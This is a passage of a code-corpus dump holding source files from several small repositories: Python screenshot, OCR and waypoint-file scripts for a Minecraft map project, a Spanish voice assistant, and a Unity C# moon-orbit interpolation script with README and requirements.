9):\n\t\t# click at x1902 y1022\n\t\tpyautogui.click(x=1902, y=1022)\n" }, { "alpha_fraction": 0.5717703104019165, "alphanum_fraction": 0.5837320685386658, "avg_line_length": 33.83333206176758, "blob_id": "69aac3c766c892c099b81d05f46d6f320a83376d", "content_id": "a6db6a2eca9e195d8faf31b46d47335a3edf4014", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/waypoints/v2/111-split.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "lines_per_file = 1\nsmallfile = None\nwith open('111.txt') as bigfile:\n for lineno, line in enumerate(bigfile):\n if lineno % lines_per_file == 0:\n if smallfile:\n smallfile.close()\n small_filename = 'zzz_split_{}.txt'.format(lineno 
+ lines_per_file)\n smallfile = open(small_filename, \"w\")\n smallfile.write(line)\n if smallfile:\n smallfile.close()\n" }, { "alpha_fraction": 0.6854838728904724, "alphanum_fraction": 0.6854838728904724, "avg_line_length": 16.85714340209961, "blob_id": "dbfcdcfd75ccfa5cf2963730a0f15cd60a81906e", "content_id": "b4d6ac021a680cb5c227141d4f2a748c28791126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/waypoints/v2/list-all-files.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport os, sys\n\npath = '.'\nfiles = os.listdir(path)\nfor name in files:\n print(name)" }, { "alpha_fraction": 0.7090619802474976, "alphanum_fraction": 0.7217805981636047, "avg_line_length": 19.96666717529297, "blob_id": "559ee7f050263dab1bcd2063484597c46abb8525", "content_id": "f008cd7793d0b650412776564d0ddb2453b1ca38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 629, "license_type": "no_license", "max_line_length": 57, "num_lines": 30, "path": "/tesseract-python/bin/run-all.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\nimport sys\nimport keyboard\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot active window\nscreen = Gdk.get_default_root_window().get_screen()\nw = screen.get_active_window()\npb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\npb.savev(\"active.png\", \"png\", (), ())\n\n# run tesseract from bash\nbashCommand = \"tesseract active.png stdout > output1.txt\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(1.3)\n\n# press down arrow key\nkeyboard.press('down')\n" }, { 
"alpha_fraction": 0.6523809432983398, "alphanum_fraction": 0.6809523701667786, "avg_line_length": 31.384614944458008, "blob_id": "ecc352ac75ed885d3c51d23d56f8c55354915855", "content_id": "479f8482dc5373371ea89f976f7fbba976ab7407", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/python-map/get-screenshot.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#include <gdk-pixbuf/gdk-pixbuf.h>\nfrom gi.repository import Gdk, GdkPixbuf\n\nw = Gdk.get_default_root_window()\nsz = w.get_geometry()[2:4]\n#print \"The size of the window is %d x %d\" % sz\npb = Gdk.pixbuf_get_from_window(w, 1783, 1064, sz[1], sz[1])\nif (pb != None):\n\tpb.savev(\"images/screenshot.png\",\"png\", [], [])\n\tprint \"Screenshot saved to screenshot.png.\"\nelse:\n\tprint \"Unable to get the screenshot.\"" }, { "alpha_fraction": 0.7473683953285217, "alphanum_fraction": 0.7520467638969421, "avg_line_length": 32.040000915527344, "blob_id": "5edd094181fc8b730c29e44b4847409d36beb5b5", "content_id": "504c5be3c13d9a596e34967b4f8ec09a0a603aab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 104, "num_lines": 25, "path": "/tesseract-python/lib/python3.6/site-packages/pymsgbox/native.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "# These functions use the operating system's native message box calls.\r\n\r\nimport sys\r\n\r\n# default back to the original functions if no native functions exist.\r\nimport pymsgbox\r\nalert = pymsgbox.alert\r\nconfirm = pymsgbox.confirm\r\nprompt = pymsgbox.prompt\r\npassword = pymsgbox.password\r\n\r\n\r\n# The platformModule is where we reference the platform-specific functions.\r\nif sys.platform.startswith('java'):\r\n import 
pymsgbox._native_java as platformModule\r\nelif sys.platform == 'darwin':\r\n import pymsgbox._native_osx as platformModule\r\nelif sys.platform == 'win32':\r\n import pymsgbox._native_win as platformModule\r\n alert = platformModule.alert\r\n confirm = platformModule.confirm\r\nelse:\r\n import pymsgbox._native_x11 as platformModule\r\n\r\nplatformModule # this line used to silence the linting tool. Will be removed once implementation is done\r\n\r\n\r\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7769230604171753, "avg_line_length": 20.66666603088379, "blob_id": "6b20df8fd91fba7c2d4fd11fc0ddf30e9cd4ed9b", "content_id": "35d698ce53ce1c766d64b7c3df4a0c0d5c037721", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/tesseract-python2/run-ocr.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\n# run tesseract from bash\nbashCommand = \"tesseract active.png stdout >> output1.txt\"\nos.system(bashCommand)\n" }, { "alpha_fraction": 0.603554368019104, "alphanum_fraction": 0.6199589967727661, "avg_line_length": 30.80434799194336, "blob_id": "fc0fc984a5eefa5c7760b78991bcbffbeeb0e784", "content_id": "501e18c6860eaa89e59ae0fa89dd39dc135a9a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "no_license", "max_line_length": 352, "num_lines": 46, "path": "/waypoints/v2/rename.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\n\nif sys.version_info[0] != 3 or sys.version_info[1] < 0:\n\tprint(\"This script requires Python version 3.0\")\n\tsys.exit(1)\n\nfor x in range(0, 1000):\t\n\t# list out files\n\tfileList = ['zzz_split_19.txt', 'zzz_split_3.txt', 'zzz_split_78.txt']\n\t\n\t# define the current file as a 
random choice\n\tcurrentfile = random.choice(fileList)\n\tprint(currentfile)\n\n\t# define this\n\t#convertedname = \"'\" + currentfile + \"', \"\n\t#print(convertedname)\n\n\t# open current file and read first line\n\twith open(currentfile) as f:\n\t\tfirst_line = f.readline()\n\t\tfirst_line = first_line.rstrip()\n\n\t# define fullnamejson as END + first_line + .json\n\tfullnamejson = \"END_\" + first_line + \".json\"\n\n\t# define fullname as END + first_line\n\tfullname = \"END_\" + first_line\n\n\tos.rename(currentfile, fullnamejson)\n\tprint(fullnamejson)\n\n\t# define x y and z\n\tx, y, z =first_line.split(',')\n\n\t# define formatted as what will be written to the file\n\tformatted = \"{\\n \\\"id\\\": \\\"\" + fullname + \"\\\",\\n \\\"name\\\": \\\"END\\\",\\n \\\"icon\\\": \\\"waypoint-normal.png\\\",\\n \\\"x\\\": \" + x + \",\\n \\\"y\\\": \" + y + \",\\n \\\"z\\\": \" + z + \",\\n \\\"r\\\": 61,\\n \\\"g\\\": 1,\\n \\\"b\\\": 164,\\n \\\"enable\\\": true,\\n \\\"type\\\": \\\"Normal\\\",\\n \\\"origin\\\": \\\"journeymap\\\",\\n \\\"dimensions\\\": [\\n 0\\n ],\\n \\\"persistent\\\": true\\n}\"\n\tprint(formatted)\n\n\t# write to file\n\twith open(fullnamejson, \"w\") as text_file:\n\t\t##print(f(fullnamejson), file=text_file)\n\t\tprint(f'{formatted}', file=text_file)\n" }, { "alpha_fraction": 0.6926714181900024, "alphanum_fraction": 0.7044917345046997, "avg_line_length": 22.5, "blob_id": "0571f1dc23fe34aafffdb6acc10538d4cd9ea207", "content_id": "24e0c149fd4a32259dc34551ec53949d908709d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/tesseract-python2/get-screenshot-v2.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\n\n# select window called Go to\nbashCommand = 
\"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot active window\nscreen = Gdk.get_default_root_window().get_screen()\nw = screen.get_active_window()\npb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\npb.savev(\"active.png\", \"png\", (), ())\n" }, { "alpha_fraction": 0.6171616911888123, "alphanum_fraction": 0.6633663177490234, "avg_line_length": 32.66666793823242, "blob_id": "0dcb3110c43537bf64d1a24f713529dc5b879d36", "content_id": "a6fbe8579b5c60cd1786fdd31e266df16392b545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 303, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/tesseract-python/get-screenshot.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\n\nw = Gdk.get_default_root_window()\nsz = w.get_geometry()[2:4]\n#print \"The size of the window is %d x %d\" % sz\npb = Gdk.pixbuf_get_from_window(w, 1783, 1064, sz[1], sz[1])\npb.savev(\"images/screenshot.png\",\"png\", [], [])\n" }, { "alpha_fraction": 0.621004581451416, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 20.799999237060547, "blob_id": "03eb6cc151b43ec203645fc24654713b3767f113", "content_id": "757697c14a5100c466b6066000770238a3ea6cbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 35, "num_lines": 10, "path": "/tesseract-python2/press-buttons.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import pyautogui, sys, os\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# loop this many times\nfor x in range(0, 9):\n\t# click at x1902 y1022\n\tpyautogui.click(x=1902, y=1022)\n\n" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 
0.692307710647583, "avg_line_length": 12.25, "blob_id": "ac37941522558d5fc117d046112b2d3aecf4f42f", "content_id": "27c8b0673bca388841c9f5679aca81ae511d098c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/rename-waypoints/create-numbers.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "input = 0\noutput = range(input + 189)\n\nprint(output)" }, { "alpha_fraction": 0.7627118825912476, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 14, "blob_id": "d9c6ad12119112cd1886f20fda340d90cb21aa75", "content_id": "cf822fb89d64f9ec86aef4b231cd67ffaa14a013", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/tesseract-python2/check-version.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\n\nbashCommand = \"python -V\"\nos.system(bashCommand)" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6361702084541321, "avg_line_length": 28.978723526000977, "blob_id": "0229c9bbae89445940f27b1d9b8878e09dde30b5", "content_id": "5009b25216ae45623bc1b5256701dd124f355881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 351, "num_lines": 47, "path": "/waypoints/v2/write.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\n\nif sys.version_info[0] != 3 or sys.version_info[1] < 0:\n\tprint(\"This requires Python version 3.0 or higher\")\n\tsys.exit(1)\n\n# list out files\nfileList = ['zzz_split_1.txt']\n\n# define the current file as a random choice\ncurrentfile = random.choice(fileList)\nprint(currentfile)\n\n# define 
this\n#convertedname = \"'\" + currentfile + \"', \"\n#print(convertedname)\n\n# open current file and read first line\nwith open(currentfile) as f:\n\tfirst_line = f.readline()\n\tfirst_line = first_line.rstrip()\nprint(currentfile)\nprint(first_line)\n\n# define fullnamejson as END + first_line + .json\nfullnamejson = \"END_\" + first_line + \".json\"\n\n# define fullname as END + first_line\nfullname = \"END_\" + first_line\n\nos.rename(currentfile, fullnamejson)\nprint(fullnamejson)\n\n# define x y and z\nx, y, z =first_line.split(',')\n\n# define formatted as what will be written to the file\nformatted = \"{\\n \\\"id\\\": \\\"\" + fullname + \"\\\",\\n \\\"name\\\": \\\"END\\\",\\n \\\"icon\\\": \\\"waypoint-normal.png\\\",\\n \\\"x\\\": \" + x + \",\\n \\\"y\\\": \" + y + \",\\n \\\"z\\\": \" + z + \",\\n \\\"r\\\": 61,\\n \\\"g\\\": 1,\\n \\\"b\\\": 164,\\n \\\"enable\\\": true,\\n \\\"type\\\": \\\"Normal\\\",\\n \\\"origin\\\": \\\"journeymap\\\",\\n \\\"dimensions\\\": [\\n 0\\n ],\\n \\\"persistent\\\": true\\n}\"\nprint(formatted)\n\n# write to file\nwith open(fullnamejson, \"w\") as text_file:\n\t##print(f(fullnamejson), file=text_file)\n\tprint(f'{formatted}', file=text_file)\n\n" }, { "alpha_fraction": 0.6213333606719971, "alphanum_fraction": 0.637333333492279, "avg_line_length": 25.785715103149414, "blob_id": "b1609a5d2e1bcaae08dd7fde347a40051bcb176c", "content_id": "90632d2adfffff546813b0aa61a083aba03d6af8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 375, "license_type": "no_license", "max_line_length": 66, "num_lines": 14, "path": "/tesseract-python2/current-mouse-pos.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import pyautogui, sys\n\nprint('Press Ctrl-C to quit.')\ntry:\n\twhile True:\n\t\tx, y = pyautogui.position()\n\t\tpositionStr = 'X: ' + str(x).rjust(4) + ' Y: ' + str(y).rjust(4)\n\t\tpositionStr2 = '\\b' * (len(positionStr) + 2)\n\t\twith 
open('output3.txt', 'w') as f:\n\t\t\tprint(positionStr, file=f)\n\t\t\tprint(positionStr2, file=f)\n\t\tsys.stdout.flush()\nexcept KeyboardInterrupt:\n\tprint('\\n')\n" } ]
18
WilverC/VozPython
https://github.com/WilverC/VozPython
8500cd03d410d0104423c34b265822f053cb335c
80bf5a68a86b239b91f657977f20f64b90114c28
b543847966fe34780a2be1fea9d931ccc2b19b00
refs/heads/master
2023-04-20T16:15:17.114927
2021-05-12T19:24:38
2021-05-12T19:24:38
366,822,352
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.541141152381897, "alphanum_fraction": 0.5447447299957275, "avg_line_length": 29.83333396911621, "blob_id": "93ac8f7b706b824a8766b624a221607a9ab41bf4", "content_id": "460fcc9dc2e47f341d32ec5822583260f4ac442e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1666, "license_type": "no_license", "max_line_length": 75, "num_lines": 54, "path": "/Asistente.py", "repo_name": "WilverC/VozPython", "src_encoding": "UTF-8", "text": "import pyttsx3 as voz\nimport speech_recognition as sr\nimport subprocess as sb\nimport datetime as dt\n\n#configuracion de la voz del asistente\nvoice = voz.init()\nvoices = voice.getProperty('voices')\nvoice.setProperty('voice', voices[0].id)\nvoice.setProperty('rate', 140)\n\ndef say(text):\n voice.say(text)\n voice.runAndWait()\n\nwhile True:\n recognizer = sr.Recognizer()\n\n #Activar microfono\n with sr.Microphone() as source:\n print('Escuchando...')\n audio = recognizer.listen(source, phrase_time_limit=3)\n \n try: #si entiende la peticion, entramos en la logica\n comando = recognizer.recognize_google( audio, language='es-MX')\n print(f'Creo que dijiste \"{comando}\"')\n\n comando = comando.lower()\n comando = comando.split(' ')\n\n if 'computadora' in comando:\n if 'abre' in comando or 'abrir' in comando:\n\n sites = {\n 'google' : 'google.com',\n 'youtube' : 'youtube.com',\n 'instagram' : 'instagram.com'\n }\n\n for i in list( sites.keys() ):\n if i in comando:\n sb.call(f'start chrome.exe {sites[i]}', shell=True)\n say(f'Abriendo {i}')\n elif 'hora' in comando:\n time = dt.now().strftime('%H:%M')\n say(f'Son las {time}')\n\n for i in ['termina','terminar', 'término']:\n if i in comando:\n say('Sesion finalizada')\n break\n \n except: #Si no entiende nos dara un mensaje\n print('No entendi, por favor vuelve a intentarlo')\n" } ]
1
gerkenma/Position-Detection
https://github.com/gerkenma/Position-Detection
3f92f06b6da048f4a80f684029c2d460c83f69b0
f2bd08352e0e316d7f5ffd191e45e689e5b5aba6
79e627bb08eefe0eab5e1e4b98b07d838fe59975
refs/heads/master
2023-02-25T10:16:08.742118
2020-05-16T14:39:50
2020-05-16T14:39:50
188,628,053
0
0
null
2019-05-26T01:27:56
2020-05-16T14:39:58
2023-02-15T21:23:58
C#
[ { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 86.5, "blob_id": "2c0a27c809c98ab454e46f51d137f3f32eaa3ae4", "content_id": "156133f83d4b21f6332685b285e0c2f061564518", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 174, "license_type": "no_license", "max_line_length": 147, "num_lines": 2, "path": "/training_data_generation/README.md", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "# Training Data Generation\nAll info about using the Unity simulation to generate pictures as training data can be found in Unity_Simulation_and_Orekit_Java_Program_Guide.docx" }, { "alpha_fraction": 0.5989304780960083, "alphanum_fraction": 0.6233206987380981, "avg_line_length": 39.566139221191406, "blob_id": "51a67f88815e3f3249bebce9395af27775e97f4c", "content_id": "818257aab0714a0c4ee150e5dda19d968db892c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 7669, "license_type": "no_license", "max_line_length": 155, "num_lines": 189, "path": "/training_data_generation/scripts/Unity/MoonRotation.cs", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections;\nusing System.Collections.Generic;\nusing System.Runtime.Serialization.Formatters.Binary;\nusing System.IO;\nusing UnityEngine;\n\npublic class MoonRotation : MonoBehaviour {\n //This script governs the behavior of the Moon component in the Unity environment\n //It interpolates between the points described in the MoonData.csv file\n\n //A tutorial that shows the basic methodology used in implementing interpolation can be found on\n //the Vector3.Lerp page in the Unity Scripting API\n\n //List of ArrayLists that contains all of the parsed data from the csv file\n List<ArrayList> table = new List<ArrayList>();\n\n //Boolean variable that keeps track of whether the year specfied in the 
DateConfig file is \"2019\"\n private bool istwoZeroOneNine = true;\n\n //Arrays to keep track of the total days of the year elapsed at the start of each month\n private int[] twoZeroOneNineDaySumsByMonth = { 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334 };\n private int[] twoZerotwoZeroDaySumsByMonth = { 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335 };\n\n //ArrayList to take the parsed data from the DateConfig file\n private ArrayList config = new ArrayList();\n\n //The number of units per second that the object travels in the simulation - can be increased or reduced manually\n private float speed = 20.0f;\n \n //Other variables to assist the script in interpolating between the points detailed in the MoonData.csv file\n private float startTime;\n private float journeyLength;\n private float fracJourney;\n private float distCovered;\n public int index = 0;\n private ArrayList startpoint;\n private ArrayList endpoint;\n private Vector3 startposition;\n private Vector3 endposition;\n\n //Scale factor to keep the Moon orbiting around the Earth at a 90 unit radius in Unity,\n //instead of at an astronomically high radius\n private float scalefactor = 19700000f;\n\n public static T DeepClone<T>(T obj)\n {\n using (var stream = new MemoryStream())\n {\n var formatter = new BinaryFormatter();\n formatter.Serialize(stream, obj);\n stream.Position = 0;\n return (T)formatter.Deserialize(stream);\n }\n }\n\n // Use this for initialization\n void Start()\n {\n\n //Code block that reads from the MoonData.csv file and loads the rows into the table variable\n using (var reader = new StreamReader(\"MoonData.csv\"))\n {\n string line;\n string[] values;\n ArrayList alist = new ArrayList();\n\n while (!reader.EndOfStream)\n {\n line = reader.ReadLine();\n values = line.Split(',');\n alist.Add(Convert.ToInt32(values[2]));\n alist.Add(Convert.ToInt32(values[3]));\n alist.Add(Convert.ToInt32(values[4]));\n alist.Add(Convert.ToInt32(values[5]));\n 
alist.Add(Convert.ToInt32(values[6]));\n alist.Add(Convert.ToInt32(values[7]));\n alist.Add(float.Parse(values[8], System.Globalization.NumberStyles.Float));\n alist.Add(float.Parse(values[9], System.Globalization.NumberStyles.Float));\n alist.Add(float.Parse(values[10], System.Globalization.NumberStyles.Float));\n table.Add(DeepClone(alist));\n alist.Clear();\n }\n }\n\n //Instantation of variables to assist in interpolation\n startTime = Time.time;\n startpoint = table[index];\n endpoint = table[index + 1];\n\n //The points in the Unity environment that the Moon should interpolate between\n //The points need to be converted from a space dynamics coordinate system to the Unity coordinate system\n //Space dynamics coordinates: (x, y, z)\n // |\n // V\n //Unity coordinates: (-y, z, x)\n //x, y, and z in space dynamics coordinates are rearranged in unity, so that\n //the y coordinate in space dynamics is made negative and is the new x coordinate in Unity\n //the x coordinate in space dynamics is made into the new z coordinate in Unity\n //the z coordinate in space dynamics is made into the new y coordinate in Unity\n startposition = new Vector3(-((float)startpoint[7] / scalefactor), ((float)startpoint[8] / scalefactor), ((float)startpoint[6] / scalefactor));\n endposition = new Vector3(-((float)endpoint[7] / scalefactor), ((float)endpoint[8] / scalefactor), ((float)endpoint[6] / scalefactor));\n\n journeyLength = Vector3.Distance(startposition, endposition);\n\n //Debug.Log(journeyLength);\n\n //Code block to read from the DateConfig file\n using (var reader2 = new StreamReader(\"DateConfig.txt\"))\n {\n string line;\n string[] values;\n\n while (!reader2.EndOfStream)\n {\n line = reader2.ReadLine();\n values = line.Split(' ');\n config.Add(values[1]);\n }\n }\n\n //Checks to see if the year is 2019 or not. 
If it's not, then the simulation starts reading from the 8761st row\n //in the csv file\n if ((string)config[0] == \"2019\")\n {\n\n }\n else\n {\n index += 8760;\n istwoZeroOneNine = false;\n }\n\n int month = Convert.ToInt32(config[1]);\n int day = Convert.ToInt32(config[2]);\n int hour = Convert.ToInt32(config[3]);\n\n //Code to figure out what row number in the csv file the simulation starts at\n //For every month, 24 * the number of days in that month is added to the starting row number\n //For every day, 24 are added to the starting row number\n //For every hour, 1 is added to the starting row number\n if (istwoZeroOneNine == true)\n {\n index += (twoZeroOneNineDaySumsByMonth[month - 1] * 24) + ((day - 1) * 24) + (hour);\n }\n else\n {\n index += (twoZerotwoZeroDaySumsByMonth[month - 1] * 24) + ((day - 1) * 24) + (hour);\n }\n\n //Debug.Log(index + 1);\n }\n\n // Update is called once per frame\n void Update()\n {\n //transform.RotateAround(Vector3.zero, new Vector3(0, 1, 0), 2.5f*Time.deltaTime);\n\n //If Point B is reached by the directional light, the next point is taken from the csv file, and the directional\n //light component starts interpolating to that point\n if ((transform.position == endposition) && ((index + 1) != (table.Count - 1)))\n {\n index++;\n\n distCovered = 0;\n fracJourney = 0;\n startTime = Time.time;\n startpoint = table[index];\n endpoint = table[index + 1];\n\n startposition = new Vector3(-((float)startpoint[7] / scalefactor), ((float)startpoint[8] / scalefactor), ((float)startpoint[6] / scalefactor));\n endposition = new Vector3(-((float)endpoint[7] / scalefactor), ((float)endpoint[8] / scalefactor), ((float)endpoint[6] / scalefactor));\n\n journeyLength = Vector3.Distance(startposition, endposition);\n //Debug.Log(journeyLength);\n }\n\n //Code to do the interpolation process\n distCovered = (Time.time - startTime) * speed;\n\n fracJourney = distCovered / journeyLength;\n\n transform.position = Vector3.Lerp(startposition, 
endposition, fracJourney);\n\n //Ensures that the directional light component continuously looks at the center of the\n //Unity environment - where Earth is\n transform.LookAt(Vector3.zero);\n }\n}\n" }, { "alpha_fraction": 0.7789676189422607, "alphanum_fraction": 0.7833607792854309, "avg_line_length": 78.15217590332031, "blob_id": "c93cd9979656ce616c91656efffe212355c85dd5", "content_id": "d64aad2e5a77c008996eafa2faea96cc87a5456c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3642, "license_type": "no_license", "max_line_length": 1635, "num_lines": 46, "path": "/README.md", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "# CubeSat Location Identification\n\n## Team\n\n**Developer**\n> Mark Gerken\n> Rohith Perla\n> Jackson Wark\n\n\n**Professor:**\n> David Ferry, PhD.\n\n**Faculty Mentor**\n> Erin Chambers, PhD.\n\n**Client**\n> Keith Bennett\n\n## Requirements\n- Python 2.6+\n- TensorFlow 1.13.x\n- Numpy 1.15.x\n- ARES 1.3\n\n## Set up\n\n1. ~ARES installed to Raspberry Pi Zero via [install guide](https://github.com/gerkenma/Position-Detection).~ (ARES removed from public facing git repository)\n2. Install [Python](https://www.python.org/downloads/)\n3. If not installed, install Virtualenv with `pip install virtualenv`\n4. Navigate in a terminal window to the root directory of the project and set up a virtual environment with `virtualenv venv`\n5. Activate the virtual environment with `venv\\Scripts\\activate` on a Windows machine or `source venv\\bin\\activate`\n\t- *More complete directions can be found [here](https://virtualenv.pypa.io/en/stable/userguide/#activate-script)*\n6. 
Install the required Python packages with `pip install -r requirements.txt\n\n*Note: ARES software not included within repo due to private nature*\n\n*Note: Training datasets not included within repo due to large size, however samples are available [here](https://github.com/gerkenma/Position-Detection/tree/master/training_data_generation/picture_examples).* \n\n## Training\n\nTraining data generated from Unity simulation. The program [cnn_classifier.py](https://github.com/gerkenma/Position-Detection/blob/master/cnn_files/cnn_classifier.py) should be trained on external hardware, not the Raspberry Pi. Datasets may be created by pointing appropriate datapath to a directory containing subdirectories of all possible classifications. All images inside each subdirectory is assumed to belong to that classification label. All training automatically completes with an evalation of a percentage of the data and outputs the results to the file [cnn_results.csv](https://github.com/gerkenma/Position-Detection/blob/master/cnn_files/cnn_results.csv).\n\n## Porting Trained Neural Network to Raspberry Pi Zero\n\nOnce the network is trained checkpoint files (.ckpt) will have automatically been generated in the directory specified as the model directory in cnn_classifier.py. This directory in it's entirety may be copied to the Raspberry Pi, but it may be more desirable to copy only the neccessary files due to their size. The neccessary files are those marked as 'model.ckpt-X.Y' where X is an integer and Y is either data, index, or meta. The checkpoint with the highest X is the most recent and will be used for inference. Copy all three types (or the entire directory) to the directory 'ares/aps/tmp/space_classifier_model/' after first removing its previous contents. Open the file APSReasonerLOCORI.py. Check the global dictionary 'selected_params' and replace the values of the hyperparameters with the corresponding values from cnn_results.csv for the selected trial. 
If changes have been made to the 'cnn_model_fn()' in cnn_classifier.py before training, replace the 'cnn_model_fn()' in APSReasonerLOCORI.py with the identical new model function from the training script. This may also warrant changes to the 'predict_input_fn()' if the input size has changed. To run inference, place one or more images in the directory 'ares/aps/tmp/predictions/predictions/'. Navigate to 'ares/aps/' and run the command 'python APSUI.py'. This will run the user interface for the APS subsystem with LOCORI loaded. The user interface will prompt several times. Type 'ta' to run the test platform, and press the the return key for the next four to run default settings. When prompted how many steps to run, press return to execute the default one step. \n" }, { "alpha_fraction": 0.47183099389076233, "alphanum_fraction": 0.6830986142158508, "avg_line_length": 15.384614944458008, "blob_id": "e5ee0fe835e5aa85a55f404227e91df41a20a53d", "content_id": "58bb0bf5b8cc850079d87c8a7d39817124ad7067", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 426, "license_type": "no_license", "max_line_length": 26, "num_lines": 26, "path": "/requirements.txt", "repo_name": "gerkenma/Position-Detection", "src_encoding": "UTF-8", "text": "absl-py==0.7.0\nastor==0.7.1\ncertifi==2019.3.9\ndecorator==4.4.0\nfuture==0.17.1\ngast==0.2.2\ngrpcio==1.16.1\nh5py==2.9.0\nhyperopt==0.1.2\nKeras-Applications==1.0.7\nKeras-Preprocessing==1.0.9\nMarkdown==3.0.1\nmkl-fft==1.0.6\nmkl-random==1.0.1\nnetworkx==2.3\nnumpy==1.15.4\nprotobuf==3.6.0\npymongo==3.7.2\nscikit-learn==0.20.1\nscipy==1.1.0\nsix==1.12.0\ntensorboard==1.11.0\ntensorflow==1.15.2\ntermcolor==1.1.0\ntqdm==4.31.1\nWerkzeug==0.15.2\n" }, { "alpha_fraction": 0.6679501533508301, "alphanum_fraction": 0.6807847619056702, "avg_line_length": 33.738853454589844, "blob_id": "d7c5bbba22bdcceba6d84b43e7127dc14e4a7d52", "content_id": "bc6914e2ffb801aa5979f86709aaa87e661ae25c", 
